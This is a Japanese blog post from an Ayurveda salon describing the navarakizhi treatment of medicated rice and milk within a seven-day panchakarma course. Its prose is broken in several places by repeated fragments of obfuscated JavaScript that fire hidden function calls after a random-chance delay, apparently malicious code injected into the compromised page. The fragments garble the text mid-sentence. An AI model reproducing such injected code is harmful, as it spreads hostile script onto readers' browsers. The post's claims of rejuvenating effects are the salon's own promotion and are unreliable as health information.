パンチャカルマ第4回 ナバラキリ

東京・阿佐ヶ谷のアーユルヴェーダ専門サロンmanas《マナス》です
さて、7日間のパンチャカルマも後半に入りました。
これまでの3日間での変化というと、
私自身は、みんなに「肉が少し柔らかくなった!」と
言われたくらいかな。
ほかのメンバーも、好転反応でしっしんが出始めたり、
快便になってきたり、少しずつ変化しつつも、
まだまだこれから!…と言う感じ。
そんな中、4日目からは、
新たなトリートメントに変わりました。
《4~7日目》andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}
 ・ナバラキリ
 ・ダンニャムラダラー
 ・バスティ
andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}

では、まずは「ナバラキリ」andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}の説明から。
これは、ナバラライスと言う、お米を使ったトリートメント。
お米と言っても、ただのお米でなく、
アーユルヴェーダの治療用に作られた薬用のお米なのです。
ナバラライス
これは結構、準備に時間がかかります。
まず、ナバラキリ用のハーブを水で煮出して、薬液を作ります。
そして、薬用のお米・ナバラライスを、その薬液で炊き、
布で包んだもの(ボール)を用意するのです。
ナバラキリ
そして、いよいよ施術。
先ほどの薬液とミルクを合わせて温めます。
この薬用ミルクに、ナバラライスのボールをつけて温めて、
それを体にポンポンしたり、こすったりするのです。
要は、それだけ。
ひたすらこの作業の繰り返しです。
ただし、ボールは、冷めたら薬用ミルクにつけて温めなおし、
姿勢を変えながら全身くまなく、ポンポンごしごししていきます。
ちなみに「ポンポン」は、ボールが熱すぎるといけないので、
温度調節の意味でやってるだけ。
大切なのは、すりこむこと。
手でボールを絞るように握って、
布の間から、お米のとろっとしたエキスが出るようにしながら、
ボールで肌をこすっていくんです。
アーユルヴェーダでは、オイルを使った施術がメジャーなので、
私も、オイル以外は初めての体験でした。
部屋の中いっぱいに、ミルク粥みたいな甘い匂いが漂って
なんか美味しそう。(笑)
また、オイルではなく、ミルクを使うために
あったかいのに、体の熱を取っていく感じも。
ちなみに、ナバラキリの効果の1つに、体内組織の再生、
つまり若返り的な効果があるそうですが、
目に見える変化として、肌がすぐスベスベになります。
嬉しい効果ですよねー
では、次回は、
いかにも謎めいた名前、「ダンニャムラダラー」です!
続く・・・
アーユルヴェーダサロンmanas 《マナス》

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です